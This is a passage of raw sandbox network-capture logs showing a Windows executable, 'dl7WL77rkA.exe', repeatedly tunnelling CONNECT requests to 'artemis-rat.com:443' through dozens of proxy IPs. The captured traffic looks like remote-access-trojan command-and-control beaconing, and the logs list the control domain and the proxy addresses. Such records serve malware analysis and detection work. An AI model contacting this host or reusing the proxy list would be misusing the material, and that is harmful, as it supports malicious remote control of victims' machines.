                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.643428087 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:40 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            738192.168.2.55210982.113.157.122312803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.489145994 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            739192.168.2.552073185.104.63.5731283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.489782095 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.201930046 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.202281952 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.201984882 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:07.900358915 CET39INHTTP/1.1 200 Connection established
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:08.928154945 CET39INHTTP/1.1 200 Connection established
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:11.999728918 CET39INHTTP/1.1 200 Connection established
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:18.143877029 CET39INHTTP/1.1 200 Connection established
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:30.176146984 CET39INHTTP/1.1 200 Connection established
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:54.240824938 CET39INHTTP/1.1 200 Connection established


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            740192.168.2.55196620.219.182.5931293876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.491908073 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.894234896 CET39INHTTP/1.1 200 Connection established


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            741192.168.2.552102195.248.243.14972373876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.494740963 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.201900005 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            742192.168.2.55211138.242.199.111372933876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.497497082 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.139208078 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.108282089 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.939491034 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.572624922 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.214389086 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:54.905148029 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:02.115803957 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            743192.168.2.552223172.67.181.20803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.505565882 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.659964085 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:40 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            744192.168.2.552224104.16.107.142803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.506843090 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.661190033 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:40 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            745192.168.2.55208279.119.155.6380803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.507128000 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            746192.168.2.552130174.64.199.7941453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.507249117 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            747192.168.2.552169194.4.50.132123343876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.507250071 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            748192.168.2.55213172.195.34.4241453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.507756948 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            749192.168.2.55213372.206.181.97649433876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.508167982 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            750192.168.2.55213272.210.252.13741453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.508331060 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            751192.168.2.55213470.166.167.38577283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.521159887 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            752192.168.2.551420160.153.254.240485023876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.521178007 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.607786894 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.702475071 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:52.780483007 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            753192.168.2.55207231.43.158.10888883876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.522083998 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            754192.168.2.55213672.195.114.16941453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.522998095 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            755192.168.2.552089161.97.74.176300003876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.523487091 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.864326954 CET729INHTTP/1.0 501 Tor is not an HTTP Proxy
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 53 20 50 72 6f 78 79 2c 20 4e 6f 74 20 41 6e 20 48 54 54 50 20 50 72 6f 78 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 73 20 70 72 6f 78 79 2c 20 6e 6f 74 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 3c 2f 68 31 3e 0a 3c 70 3e 0a 49 74 20 61 70 70 65 61 72 73 20 79 6f 75 20 68 61 76 65 20 63 6f 6e 66 69 67 75 72 65 64 20 79 6f 75 72 20 77 65 62 20 62 72 6f 77 73 65 72 20 74 6f 20 75 73 65 20 74 68 69 73 20 54 6f 72 20 70 6f 72 74 20 61 73 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 0a 3c 2f 70 3e 3c 70 3e 0a 54 68 69 73 20 69 73 20 6e 6f 74 20 63 6f 72 72 65 63 74 3a 20 54 68 69 73 20 70 6f 72 74 20 69 73 20 63 6f 6e 66 69 67 75 72 65 64 20 61 73 20 61 20 53 4f 43 4b 53 20 70 72 6f 78 79 2c 20 6e 6f 74 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 20 49 66 20 79 6f 75 20 6e 65 65 64 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 20 74 75 6e 6e 65 6c 2c 20 75 73 65 20 74 68 65 20 48 54 54 50 54 75 6e 6e 65 6c 50 6f 72 74 0a 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 6f 70 74 69 6f 6e 20 69 6e 20 70 6c 61 63 65 20 6f 66 2c 20 6f 72 20 69 6e 20 61 64 64 69 74 69 6f 6e 20 74 6f 2c 20 53 4f 43 4b 53 50 6f 72 74 2e 0a 50 6c 65 61 73 65 20 63 6f 6e 66 69 67 75 72 65 20 79 6f 75 72 20 63 6c 69 65 6e 74 20 61 63 63 6f 72 64 69 6e 67 6c 79 2e 0a 3c 2f 70 3e 0a 3c 70 3e 0a 53 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 6f 72 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 68 74 6d 6c 22 3e 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 6f 72 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 68 74 6d 6c 3c 2f 61 3e 20 66 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 00
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>This is a SOCKS Proxy, Not An HTTP Proxy</title></head><body><h1>This is a SOCKs proxy, not an HTTP proxy.</h1><p>It appears you have configured your web browser to use this Tor port asan HTTP proxy.</p><p>This is not correct: This port is configured as a SOCKS proxy, notan HTTP proxy. If you need an HTTP proxy tunnel, use the HTTPTunnelPortconfiguration option in place of, or in addition to, SOCKSPort.Please configure your client accordingly.</p><p>See <a href="https://www.torproject.org/documentation.html">https://www.torproject.org/documentation.html</a> for more information.</p></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            756192.168.2.551980203.95.196.5080803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.524126053 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            757192.168.2.552063103.153.134.2080803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.524131060 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.311186075 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
